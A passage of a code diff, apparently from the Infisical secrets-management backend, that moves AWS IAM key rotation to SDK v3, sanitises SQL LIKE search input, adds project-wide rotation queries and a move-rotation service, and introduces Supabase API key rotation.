string, secretPath: string) => @@ -577,7 +576,7 @@ export const secretReplicationServiceFactory = ({ // this is used to avoid multiple times generating secret approval by failed one await keyStore.setItemWithExpiry( keystoreReplicationSuccessKey(job.id as string, destinationSecretImport.id), - SECRET_IMPORT_SUCCESS_LOCK, + KeyStoreTtls.SecretReplicationSuccessInSeconds, 1, KeyStorePrefixes.SecretReplication ); @@ -863,7 +862,7 @@ export const secretReplicationServiceFactory = ({ // this is used to avoid multiple times generating secret approval by failed one await keyStore.setItemWithExpiry( keystoreReplicationSuccessKey(job.id as string, destinationSecretImport.id), - SECRET_IMPORT_SUCCESS_LOCK, + KeyStoreTtls.SecretReplicationSuccessInSeconds, 1, KeyStorePrefixes.SecretReplication ); diff --git a/backend/src/ee/services/secret-rotation-v2/aws-iam-user-secret/aws-iam-user-secret-rotation-fns.ts b/backend/src/ee/services/secret-rotation-v2/aws-iam-user-secret/aws-iam-user-secret-rotation-fns.ts index d581cb5b9a6..b4782a240fc 100644 --- a/backend/src/ee/services/secret-rotation-v2/aws-iam-user-secret/aws-iam-user-secret-rotation-fns.ts +++ b/backend/src/ee/services/secret-rotation-v2/aws-iam-user-secret/aws-iam-user-secret-rotation-fns.ts @@ -1,4 +1,10 @@ -import IAM from "aws-sdk/clients/iam.js"; +import { + type AccessKeyMetadata, + CreateAccessKeyCommand, + DeleteAccessKeyCommand, + IAMClient, + ListAccessKeysCommand +} from "@aws-sdk/client-iam"; import { TAwsIamUserSecretRotationGeneratedCredentials, @@ -13,7 +19,7 @@ import { } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types"; import { getAwsConnectionConfig } from "@app/services/app-connection/aws"; -const getCreateDate = (key: IAM.AccessKeyMetadata): number => { +const getCreateDate = (key: AccessKeyMetadata): number => { return key.CreateDate ? new Date(key.CreateDate).getTime() : 0; }; @@ -28,10 +34,10 @@ export const awsIamUserSecretRotationFactory: TRotationFactory< } = secretRotation; const $rotateClientSecret = async () => { - const { credentials } = await getAwsConnectionConfig(connection, region); - const iam = new IAM({ credentials }); + const { credentials, region: resolvedRegion } = await getAwsConnectionConfig(connection, region); + const iam = new IAMClient({ credentials, region: resolvedRegion }); - const { AccessKeyMetadata } = await iam.listAccessKeys({ UserName: userName }).promise(); + const { AccessKeyMetadata } = await iam.send(new ListAccessKeysCommand({ UserName: userName })); if (AccessKeyMetadata && AccessKeyMetadata.length > 0) { // Sort keys by creation date (oldest first) @@ -41,21 +47,21 @@ export const awsIamUserSecretRotationFactory: TRotationFactory< if (sortedKeys.length >= 2) { const accessId = sortedKeys[0].AccessKeyId || sortedKeys[1].AccessKeyId; if (accessId) { - await iam - .deleteAccessKey({ + await iam.send( + new DeleteAccessKeyCommand({ UserName: userName, AccessKeyId: accessId }) - .promise(); + ); } } } - const { AccessKey } = await iam.createAccessKey({ UserName: userName }).promise(); + const { AccessKey } = await iam.send(new CreateAccessKeyCommand({ UserName: userName })); return { - accessKeyId: AccessKey.AccessKeyId, - secretAccessKey: AccessKey.SecretAccessKey + accessKeyId: AccessKey?.AccessKeyId ?? "", + secretAccessKey: AccessKey?.SecretAccessKey ?? "" }; }; @@ -71,17 +77,17 @@ export const awsIamUserSecretRotationFactory: TRotationFactory< generatedCredentials, callback ) => { - const { credentials } = await getAwsConnectionConfig(connection, region); - const iam = new IAM({ credentials }); + const { credentials, region: resolvedRegion } = await getAwsConnectionConfig(connection, region); + const iam = new IAMClient({ credentials, region: resolvedRegion }); await Promise.all( generatedCredentials.map((generatedCredential) => - iam - .deleteAccessKey({ + iam.send( + new DeleteAccessKeyCommand({ UserName: userName, AccessKeyId: generatedCredential.accessKeyId }) - .promise() + ) ) ); diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-dal.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-dal.ts index 4ef50038ccd..77bd7e69ac3 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-dal.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-dal.ts @@ -4,6 +4,7 @@ import { TDbClient } from "@app/db"; import { TableName } from "@app/db/schemas"; import { TSecretRotationsV2 } from "@app/db/schemas/secret-rotations-v2"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { buildFindFilter, ormify, @@ -198,10 +199,11 @@ export const secretRotationV2DALFactory = ( .countDistinct(`${TableName.SecretRotationV2}.name`); if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); void query.where((qb) => { void qb - .whereILike(`${TableName.SecretV2}.key`, `%${search}%`) - .orWhereILike(`${TableName.SecretRotationV2}.name`, `%${search}%`); + .whereILike(`${TableName.SecretV2}.key`, `%${sanitizedSearch}%`) + .orWhereILike(`${TableName.SecretRotationV2}.name`, `%${sanitizedSearch}%`); }); } @@ -265,10 +267,11 @@ export const secretRotationV2DALFactory = ( ); if (search) { + const sanitizedSearch = sanitizeSqlLikeString(search); void subquery.where((qb) => { void qb - .whereILike(`${TableName.SecretV2}.key`, `%${search}%`) - .orWhereILike(`${TableName.SecretRotationV2}.name`, `%${search}%`); + .whereILike(`${TableName.SecretV2}.key`, `%${sanitizedSearch}%`) + .orWhereILike(`${TableName.SecretRotationV2}.name`, `%${sanitizedSearch}%`); }); } @@ -469,6 +472,88 @@ export const secretRotationV2DALFactory = ( } }; + const findByProjectAndDateRange = async ( + { + projectId, + startDate, + endDate + }: { + projectId: string; + startDate: Date; + endDate: Date; + }, + tx?: Knex + ) => { + try { + const query = (tx || db.replicaNode())(TableName.SecretRotationV2) + .join(TableName.SecretFolder, `${TableName.SecretRotationV2}.folderId`, `${TableName.SecretFolder}.id`) + .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`) + .join(TableName.AppConnection, `${TableName.SecretRotationV2}.connectionId`, `${TableName.AppConnection}.id`) + .join( + TableName.SecretRotationV2SecretMapping, + `${TableName.SecretRotationV2SecretMapping}.rotationId`, + `${TableName.SecretRotationV2}.id` + ) + .join(TableName.SecretV2, `${TableName.SecretV2}.id`, `${TableName.SecretRotationV2SecretMapping}.secretId`) + .where(`${TableName.Environment}.projectId`, projectId) + .whereNotNull(`${TableName.SecretRotationV2}.nextRotationAt`); + + const rawRotations = await query + .whereBetween(`${TableName.SecretRotationV2}.nextRotationAt`, [startDate, endDate]) + .select( + selectAllTableCols(TableName.SecretRotationV2), + db.ref("name").withSchema(TableName.Environment).as("envName"), + db.ref("id").withSchema(TableName.Environment).as("envId"), + db.ref("slug").withSchema(TableName.Environment).as("envSlug"), + db.ref("id").withSchema(TableName.AppConnection).as("connectionAppId"), + db.ref("key").withSchema(TableName.SecretV2).as("secretKey"), + db.ref("id").withSchema(TableName.SecretV2).as("secretId") + ); + + if (!rawRotations.length) return []; + + const foldersWithPath = await folderDAL.findSecretPathByFolderIds( + projectId, + rawRotations.map((r) => r.folderId), + tx + ); + + const folderRecord: Record = {}; + foldersWithPath.forEach((folder) => { + if (folder) folderRecord[folder.id] = folder; + }); + + return sqlNestRelationships({ + data: rawRotations, + key: "id", + parentMapper: (rotation) => ({ + id: rotation.id, + name: rotation.name, + type: rotation.type, + nextRotationAt: rotation.nextRotationAt, + rotationInterval: rotation.rotationInterval, + rotationStatus: rotation.rotationStatus, + isAutoRotationEnabled: rotation.isAutoRotationEnabled, + environment: { slug: rotation.envSlug, name: rotation.envName, id: rotation.envId }, + folder: { + id: rotation.folderId, + path: folderRecord[rotation.folderId]?.path ?? "/" + }, + connection: { id: rotation.connectionAppId } + }), + childrenMapper: [ + { + key: "secretKey", + label: "secretKeys" as const, + mapper: ({ secretKey }) => secretKey + } + ] + }); + } catch (error) { + throw new DatabaseError({ error, name: "Find Calendar Rotations - Secret Rotation V2" }); + } + }; + const findSecretRotationsToQueue = async (rotateBy: Date, tx?: Knex) => { const secretRotations = await (tx || db.replicaNode())(TableName.SecretRotationV2) .where(`${TableName.SecretRotationV2}.isAutoRotationEnabled`, true) @@ -479,6 +564,73 @@ export const secretRotationV2DALFactory = ( return secretRotations; }; + const findByProject = async (projectId: string, tx?: Knex) => { + try { + const rawRotations = await (tx || db.replicaNode())(TableName.SecretRotationV2) + .join(TableName.SecretFolder, `${TableName.SecretRotationV2}.folderId`, `${TableName.SecretFolder}.id`) + .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`) + .join(TableName.AppConnection, `${TableName.SecretRotationV2}.connectionId`, `${TableName.AppConnection}.id`) + .join( + TableName.SecretRotationV2SecretMapping, + `${TableName.SecretRotationV2SecretMapping}.rotationId`, + `${TableName.SecretRotationV2}.id` + ) + .join(TableName.SecretV2, `${TableName.SecretV2}.id`, `${TableName.SecretRotationV2SecretMapping}.secretId`) + .where(`${TableName.Environment}.projectId`, projectId) + .select( + selectAllTableCols(TableName.SecretRotationV2), + db.ref("name").withSchema(TableName.Environment).as("envName"), + db.ref("id").withSchema(TableName.Environment).as("envId"), + db.ref("slug").withSchema(TableName.Environment).as("envSlug"), + db.ref("id").withSchema(TableName.AppConnection).as("connectionAppId"), + db.ref("key").withSchema(TableName.SecretV2).as("secretKey"), + db.ref("id").withSchema(TableName.SecretV2).as("secretId") + ); + + if (!rawRotations.length) return []; + + const foldersWithPath = await folderDAL.findSecretPathByFolderIds( + projectId, + rawRotations.map((r) => r.folderId), + tx + ); + + const folderRecord: Record = {}; + foldersWithPath.forEach((folder) => { + if (folder) folderRecord[folder.id] = folder; + }); + + return sqlNestRelationships({ + data: rawRotations, + key: "id", + parentMapper: (rotation) => ({ + id: rotation.id, + name: rotation.name, + type: rotation.type, + nextRotationAt: rotation.nextRotationAt, + rotationInterval: rotation.rotationInterval, + rotationStatus: rotation.rotationStatus, + isAutoRotationEnabled: rotation.isAutoRotationEnabled, + environment: { slug: rotation.envSlug, name: rotation.envName, id: rotation.envId }, + folder: { + id: rotation.folderId, + path: folderRecord[rotation.folderId]?.path ?? "/" + }, + connection: { id: rotation.connectionAppId } + }), + childrenMapper: [ + { + key: "secretKey", + label: "secretKeys" as const, + mapper: ({ secretKey }) => secretKey + } + ] + }); + } catch (error) { + throw new DatabaseError({ error, name: "Find by Project - Secret Rotation V2" }); + } + }; + return { ...secretRotationV2Orm, find, @@ -490,6 +642,8 @@ export const secretRotationV2DALFactory = ( insertSecretMappings: secretRotationV2SecretMappingOrm.insertMany, findWithMappedSecrets, findWithMappedSecretsCount, + findByProjectAndDateRange, + findByProject, findSecretRotationsToQueue }; }; diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts index 968c61a27b5..4643531cc87 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-enums.ts @@ -15,7 +15,8 @@ export enum SecretRotation { DbtServiceToken = "dbt-service-token", WindowsLocalAccount = "windows-local-account", OpenRouterApiKey = "open-router-api-key", - HpIloLocalAccount = "hp-ilo-local-account" + HpIloLocalAccount = "hp-ilo-local-account", + SupabaseApiKey = "supabase-api-key" } export enum SecretRotationStatus { diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts index c5950d9b29b..3a47fa50b25 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-fns.ts @@ -32,6 +32,7 @@ import { TSecretRotationV2Raw, TUpdateSecretRotationV2DTO } from "./secret-rotation-v2-types"; +import { SUPABASE_API_KEY_ROTATION_LIST_OPTION, TSupabaseApiKeyRotation } from "./supabase-api-key"; import { TUnixLinuxLocalAccountRotation, UNIX_LINUX_LOCAL_ACCOUNT_ROTATION_LIST_OPTION @@ -58,7 +59,8 @@ const SECRET_ROTATION_LIST_OPTIONS: Record { @@ -359,6 +361,17 @@ export const throwOnImmutableParameterUpdate = ( throw new BadRequestError({ message: "Cannot update rotation method or username" }); } break; + case SecretRotation.SupabaseApiKey: + if ( + haveUnequalProperties( + updatePayload.parameters as TSupabaseApiKeyRotation["parameters"], + secretRotation.parameters as TSupabaseApiKeyRotation["parameters"], + ["projectRef", "keyType"] + ) + ) { + throw new BadRequestError({ message: "Cannot update project reference or key type" }); + } + break; default: // do nothing } diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts index 15572f274b9..ca22e153cce 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-maps.ts @@ -18,7 +18,8 @@ export const SECRET_ROTATION_NAME_MAP: Record = { [SecretRotation.DbtServiceToken]: "DBT Service Token", [SecretRotation.WindowsLocalAccount]: "Windows Local Account", [SecretRotation.OpenRouterApiKey]: "OpenRouter API Key", - [SecretRotation.HpIloLocalAccount]: "HP iLO Local Account" + [SecretRotation.HpIloLocalAccount]: "HP iLO Local Account", + [SecretRotation.SupabaseApiKey]: "Supabase API Key" }; export const SECRET_ROTATION_CONNECTION_MAP: Record = { @@ -38,5 +39,6 @@ export const SECRET_ROTATION_CONNECTION_MAP: Record; auditLogService: Pick; keyStore: Pick; - folderDAL: Pick; + folderDAL: Pick< + TSecretFolderDALFactory, + "findBySecretPath" | "findBySecretPathMultiEnv" | "findSecretPathByFolderIds" + >; secretV2BridgeDAL: Pick< TSecretV2BridgeDALFactory, - "bulkUpdate" | "insertMany" | "deleteMany" | "upsertSecretReferences" | "find" | "invalidateSecretCacheByProjectId" + | "bulkUpdate" + | "insertMany" + | "deleteMany" + | "upsertSecretReferences" + | "find" + | "findOne" + | "updateById" + | "findReferencedSecretReferencesBySecretKey" + | "updateSecretReferenceEnvAndPath" + | "invalidateSecretCacheByProjectId" >; - secretVersionV2BridgeDAL: Pick; + secretVersionV2BridgeDAL: Pick; secretVersionTagV2BridgeDAL: Pick; resourceMetadataDAL: Pick; secretTagDAL: Pick; @@ -170,7 +185,8 @@ const SECRET_ROTATION_FACTORY_MAP: Record + secretV2BridgeDAL.find( + { + $in: { + [`${TableName.SecretV2}.key` as "key"]: secretKeys + }, + [`${TableName.SecretV2}.folderId` as "folderId"]: folderId, + [`${TableName.SecretV2}.type` as "type"]: SecretType.Shared + }, + tx ? { tx } : undefined + ); + const $throwOnConflictingSecrets = async ({ secretKeys, folderId, @@ -234,16 +270,7 @@ export const secretRotationV2ServiceFactory = ({ }); } - const conflictingSecrets = await secretV2BridgeDAL.find( - { - $in: { - [`${TableName.SecretV2}.key` as "key"]: secretKeys - }, - [`${TableName.SecretV2}.folderId` as "folderId"]: folderId, - [`${TableName.SecretV2}.type` as "type"]: SecretType.Shared - }, - tx ? { tx } : undefined - ); + const conflictingSecrets = await $findConflictingSecrets({ secretKeys, folderId, tx }); if (conflictingSecrets.length) { throw new BadRequestError({ @@ -926,6 +953,200 @@ export const secretRotationV2ServiceFactory = ({ return expandSecretRotation(secretRotation, kmsService); }; + const moveSecretRotation = async ( + { type, rotationId, destinationEnvironment, destinationSecretPath, overwriteDestination }: TMoveSecretRotationV2DTO, + actor: OrgServiceActor + ) => { + const plan = await licenseService.getPlan(actor.orgId); + + if (!plan.secretRotation) + throw new BadRequestError({ + message: "Failed to move secret rotation due to plan restriction. Upgrade plan to manage secret rotations." + }); + + const secretRotation = await secretRotationV2DAL.findById(rotationId); + + if (!secretRotation) + throw new NotFoundError({ + message: `Could not find ${SECRET_ROTATION_NAME_MAP[type]} Rotation with ID "${rotationId}"` + }); + + const { projectId, folderId: sourceFolderId, secretsMapping, folder, environment, connection } = secretRotation; + + if (connection.app !== SECRET_ROTATION_CONNECTION_MAP[type]) + throw new BadRequestError({ + message: `Secret Rotation with ID "${rotationId}" is not configured for ${SECRET_ROTATION_NAME_MAP[type]}` + }); + + const isRotationOccurring = Boolean(await keyStore.getItem(KeyStorePrefixes.SecretRotationLock(secretRotation.id))); + + if (isRotationOccurring) + throw new BadRequestError({ + message: "A rotation is currently in progress for this secret rotation. Please try again shortly." + }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorId: actor.id, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + actionProjectType: ActionProjectType.SecretManager, + projectId + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionSecretRotationActions.Delete, + getSecretRotationSubject(secretRotation) + ); + + const destinationFolder = await folderDAL.findBySecretPath( + projectId, + destinationEnvironment, + destinationSecretPath + ); + + if (!destinationFolder) + throw new NotFoundError({ + message: `Destination folder with path "${destinationSecretPath}" in environment "${destinationEnvironment}" not found` + }); + + if (destinationFolder.id === sourceFolderId) + throw new BadRequestError({ + message: "Source and destination locations are the same" + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionSecretRotationActions.Create, + getSecretRotationSubject(secretRotation, { + environment: destinationEnvironment, + secretPath: destinationSecretPath + }) + ); + + const mappedKeys = Object.values(secretsMapping as TSecretRotationV2["secretsMapping"]); + + const { encryptor: secretManagerEncryptor, decryptor: secretManagerDecryptor } = + await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.SecretManager, + projectId + }); + + const updatedRotation = await secretRotationV2DAL.transaction(async (tx) => { + const conflictingRotation = await secretRotationV2DAL.findOne({ + name: secretRotation.name, + folderId: destinationFolder.id + }); + + if (conflictingRotation) + throw new BadRequestError({ + message: `A Secret Rotation with the name "${secretRotation.name}" already exists at the secret path "${destinationSecretPath}"` + }); + + const conflictingDestinationSecrets = await $findConflictingSecrets({ + secretKeys: mappedKeys, + folderId: destinationFolder.id + }); + + if (conflictingDestinationSecrets.length && !overwriteDestination) { + throw new BadRequestError({ + message: `The following secrets already exist at the destination path "${destinationSecretPath}": ${conflictingDestinationSecrets + .map(({ key }) => key) + .join(", ")}. Set "overwriteDestination" to true to replace them.` + }); + } + + if (conflictingDestinationSecrets.length && overwriteDestination) { + await secretV2BridgeDAL.deleteMany( + conflictingDestinationSecrets.map((s) => ({ key: s.key, type: SecretType.Shared })), + destinationFolder.id, + actor.id, + tx + ); + } + + const sourceSecrets = await secretV2BridgeDAL.find( + { + $in: { + [`${TableName.SecretV2}.key` as "key"]: mappedKeys + }, + [`${TableName.SecretV2}.folderId` as "folderId"]: sourceFolderId, + [`${TableName.SecretV2}.type` as "type"]: SecretType.Shared + }, + { tx } + ); + + if (sourceSecrets.length) { + await tx(TableName.SecretV2) + .whereIn( + "id", + sourceSecrets.map((s) => s.id) + ) + .update({ folderId: destinationFolder.id }); + + await secretVersionV2BridgeDAL.update( + { + $in: { + secretId: sourceSecrets.map((s) => s.id) + } + }, + { folderId: destinationFolder.id }, + tx + ); + + for await (const secret of sourceSecrets) { + await fnUpdateMovedSecretReferences({ + orgId: actor.orgId, + projectId, + sourceEnvironment: environment.slug, + sourceSecretPath: folder.path, + sourceFolderId, + destinationEnvironment, + destinationSecretPath, + destinationFolderId: destinationFolder.id, + secretKey: secret.key, + secretId: secret.id, + secretDAL: secretV2BridgeDAL, + secretVersionDAL: secretVersionV2BridgeDAL, + folderCommitService, + folderDAL, + secretQueueService, + encryptor: ({ plainText }) => secretManagerEncryptor({ plainText }), + decryptor: ({ cipherTextBlob }) => secretManagerDecryptor({ cipherTextBlob }), + tx + }); + } + } + + return secretRotationV2DAL.updateById(rotationId, { folderId: destinationFolder.id }, tx); + }); + + await secretV2BridgeDAL.invalidateSecretCacheByProjectId(projectId); + + await snapshotService.performSnapshot(destinationFolder.id); + await secretQueueService.syncSecrets({ + orgId: connection.orgId, + secretPath: destinationSecretPath, + projectId, + environmentSlug: destinationEnvironment, + excludeReplication: true + }); + + await snapshotService.performSnapshot(sourceFolderId); + await secretQueueService.syncSecrets({ + orgId: connection.orgId, + secretPath: folder.path, + projectId, + environmentSlug: environment.slug, + excludeReplication: true + }); + + return { + secretRotation: await expandSecretRotation(updatedRotation, kmsService), + sourceEnvironment: environment.slug, + sourceSecretPath: folder.path + }; + }; + const triggerFailedWebhook = async ( projectId: string, environment: { slug: string; name: string; id: string }, @@ -1474,7 +1695,7 @@ export const secretRotationV2ServiceFactory = ({ { projectId, $search: { - name: `%${search}%` + name: search }, $in: { folderId: permissiveFolderMappings.map(({ folderId }) => folderId) @@ -1684,6 +1905,7 @@ export const secretRotationV2ServiceFactory = ({ findSecretRotationById, findSecretRotationByName, deleteSecretRotation, + moveSecretRotation, findSecretRotationGeneratedCredentialsById, rotateSecretRotation, rotateGeneratedCredentials, diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts index 028aa39d76d..e9a67ff84a8 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-types.ts @@ -109,6 +109,13 @@ import { } from "./redis-credentials/redis-credentials-rotation-types"; import { TSecretRotationV2DALFactory } from "./secret-rotation-v2-dal"; import { SecretRotation } from "./secret-rotation-v2-enums"; +import { + TSupabaseApiKeyRotation, + TSupabaseApiKeyRotationGeneratedCredentials, + TSupabaseApiKeyRotationInput, + TSupabaseApiKeyRotationListItem, + TSupabaseApiKeyRotationWithConnection +} from "./supabase-api-key"; import { TUnixLinuxLocalAccountRotation, TUnixLinuxLocalAccountRotationGeneratedCredentials, @@ -141,7 +148,8 @@ export type TSecretRotationV2 = | TDbtServiceTokenRotation | TWindowsLocalAccountRotation | TOpenRouterApiKeyRotation - | THpIloRotation; + | THpIloRotation + | TSupabaseApiKeyRotation; export type TSecretRotationV2WithConnection = | TPostgresCredentialsRotationWithConnection @@ -160,7 +168,8 @@ export type TSecretRotationV2WithConnection = | TDbtServiceTokenRotationWithConnection | TWindowsLocalAccountRotationWithConnection | TOpenRouterApiKeyRotationWithConnection - | THpIloRotationWithConnection; + | THpIloRotationWithConnection + | TSupabaseApiKeyRotationWithConnection; export type TSecretRotationV2GeneratedCredentials = | TSqlCredentialsRotationGeneratedCredentials @@ -175,7 +184,8 @@ export type TSecretRotationV2GeneratedCredentials = | TDbtServiceTokenRotationGeneratedCredentials | TWindowsLocalAccountRotationGeneratedCredentials | TOpenRouterApiKeyRotationGeneratedCredentials - | THpIloRotationGeneratedCredentials; + | THpIloRotationGeneratedCredentials + | TSupabaseApiKeyRotationGeneratedCredentials; export type TSecretRotationV2Input = | TPostgresCredentialsRotationInput @@ -194,7 +204,8 @@ export type TSecretRotationV2Input = | TDbtServiceTokenRotationInput | TWindowsLocalAccountRotationInput | TOpenRouterApiKeyRotationInput - | THpIloRotationInput; + | THpIloRotationInput + | TSupabaseApiKeyRotationInput; export type TSecretRotationV2ListItem = | TPostgresCredentialsRotationListItem @@ -213,7 +224,8 @@ export type TSecretRotationV2ListItem = | TDbtServiceTokenRotationListItem | TWindowsLocalAccountRotationListItem | TOpenRouterApiKeyRotationListItem - | THpIloRotationListItem; + | THpIloRotationListItem + | TSupabaseApiKeyRotationListItem; export type TSecretRotationV2TemporaryParameters = | TLdapPasswordRotationInput["temporaryParameters"] @@ -272,6 +284,14 @@ export type TDeleteSecretRotationV2DTO = { revokeGeneratedCredentials: boolean; }; +export type TMoveSecretRotationV2DTO = { + type: SecretRotation; + rotationId: string; + destinationEnvironment: string; + destinationSecretPath: string; + overwriteDestination: boolean; +}; + /** Minimal rotation shape needed to build a permission subject (env, path, connectionId). */ export type TSecretRotationV2PermissionContext = { environment: { slug: string }; diff --git a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts index be478fde0c5..8b88b76faa4 100644 --- a/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts +++ b/backend/src/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema.ts @@ -18,6 +18,7 @@ import { WindowsLocalAccountRotationSchema } from "@app/ee/services/secret-rotat import { DbtServiceTokenRotationSchema } from "./dbt-service-token"; import { HpIloRotationSchema } from "./hp-ilo-rotation"; +import { SupabaseApiKeyRotationSchema } from "./supabase-api-key"; export const SecretRotationV2Schema = z.discriminatedUnion("type", [ PostgresCredentialsRotationSchema, @@ -36,5 +37,6 @@ export const SecretRotationV2Schema = z.discriminatedUnion("type", [ DbtServiceTokenRotationSchema, WindowsLocalAccountRotationSchema, OpenRouterApiKeyRotationSchema, - HpIloRotationSchema + HpIloRotationSchema, + SupabaseApiKeyRotationSchema ]); diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/index.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/index.ts new file mode 100644 index 00000000000..9e5d61a0555 --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/index.ts @@ -0,0 +1,3 @@ +export * from "./supabase-api-key-rotation-constants"; +export * from "./supabase-api-key-rotation-schemas"; +export * from "./supabase-api-key-rotation-types"; diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-constants.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-constants.ts new file mode 100644 index 00000000000..5d0604b03ad --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-constants.ts @@ -0,0 +1,14 @@ +import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums"; +import { TSecretRotationV2ListItem } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; + +export const SUPABASE_API_KEY_ROTATION_LIST_OPTION: TSecretRotationV2ListItem = { + name: "Supabase API Key", + type: SecretRotation.SupabaseApiKey, + connection: AppConnection.Supabase, + template: { + secretsMapping: { + apiKey: "SUPABASE_API_KEY" + } + } +}; diff --git a/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-fns.ts b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-fns.ts new file mode 100644 index 00000000000..2d898d3f866 --- /dev/null +++ b/backend/src/ee/services/secret-rotation-v2/supabase-api-key/supabase-api-key-rotation-fns.ts @@ -0,0 +1,156 @@ +import { AxiosError } from "axios"; + +import { + TRotationFactory, + TRotationFactoryGetSecretsPayload, + TRotationFactoryIssueCredentials, + TRotationFactoryRevokeCredentials, + TRotationFactoryRotateCredentials +} from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types"; +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { + getSupabaseAuthHeaders, + getSupabaseInstanceUrl +} from "@app/services/app-connection/supabase/supabase-connection-public-client"; + +import { SupabaseApiKeyType } from "./supabase-api-key-rotation-schemas"; +import { + TSupabaseApiKeyCreateResponse, + TSupabaseApiKeyRotationGeneratedCredentials, + TSupabaseApiKeyRotationWithConnection +} from "./supabase-api-key-rotation-types"; + +const createErrorMessage = (error: unknown) => { + if (error instanceof AxiosError) { + const data = error.response?.data as { message?: string } | undefined; + if (data?.message) { + return data.message; + } + if (error.message) { + return error.message; + } + } + return (error as Error)?.message ?? "Unknown error"; +}; + +export const supabaseApiKeyRotationFactory: TRotationFactory< + TSupabaseApiKeyRotationWithConnection, + TSupabaseApiKeyRotationGeneratedCredentials +> = (secretRotation) => { + const { + connection, + parameters: { projectRef, keyType }, + secretsMapping + } = secretRotation; + + const connectionConfig = { + method: connection.method, + app: connection.app, + credentials: connection.credentials, + orgId: connection.orgId + }; + + const $createApiKey = async () => { + const baseUrl = await getSupabaseInstanceUrl(connectionConfig); + const headers = getSupabaseAuthHeaders(connectionConfig); + + try { + const { data } = await request.post( + `${baseUrl}/v1/projects/${encodeURIComponent(projectRef)}/api-keys`, + { + type: keyType === SupabaseApiKeyType.Publishable ? "publishable" : "secret", + name: `infisical_rotated_${keyType}_${Date.now()}`, + description: "Managed by Infisical secret rotation" + }, + { + headers: { + ...headers, + "Content-Type": "application/json" + }, + params: { reveal: true } + } + ); + + if (!data.api_key || !data.id) { + throw new Error("Invalid response from Supabase: missing 'api_key' or 'id'."); + } + + return { + apiKey: data.api_key, + keyId: data.id + }; + } catch (error: unknown) { + throw new BadRequestError({ + message: `Failed to create Supabase API key: ${createErrorMessage(error)}` + }); + } + }; + + const $deleteApiKey = async (keyId: string) => { + const baseUrl = await getSupabaseInstanceUrl(connectionConfig); + const headers = getSupabaseAuthHeaders(connectionConfig); + + try { + await request.delete( + `${baseUrl}/v1/projects/${encodeURIComponent(projectRef)}/api-keys/${encodeURIComponent(keyId)}`, + { + headers, + params: { reason: "Rotated by Infisical" } + } + ); + } catch (error: unknown) { + if (error instanceof AxiosError && error.response?.status === 404) { + return; + } + + throw new BadRequestError({ + message: `Failed to delete Supabase API key: ${createErrorMessage(error)}` + }); + } + }; + + const issueCredentials: TRotationFactoryIssueCredentials = async ( + callback + ) => { + const credentials = await $createApiKey(); + return callback(credentials); + }; + + const revokeCredentials: TRotationFactoryRevokeCredentials = async ( + credentials, + callback + ) => { + if (!credentials?.length) return callback(); + + await Promise.all(credentials.map(({ keyId }) => $deleteApiKey(keyId))); + + return callback(); + }; + + const rotateCredentials: TRotationFactoryRotateCredentials = async ( + oldCredentials, + callback + ) => { + const newCredentials = await $createApiKey(); + + const result = await callback(newCredentials); + + if (oldCredentials?.keyId) { + await $deleteApiKey(oldCredentials.keyId); + } + + return result; + }; + + const getSecretsPayload: TRotationFactoryGetSecretsPayload = ({ + apiKey + }) => [{ key: secretsMapping.apiKey, value: apiKey }]; + + return { + issueCredentials, + revokeCredentials, + rotateCredentials, + getSecretsPayload + 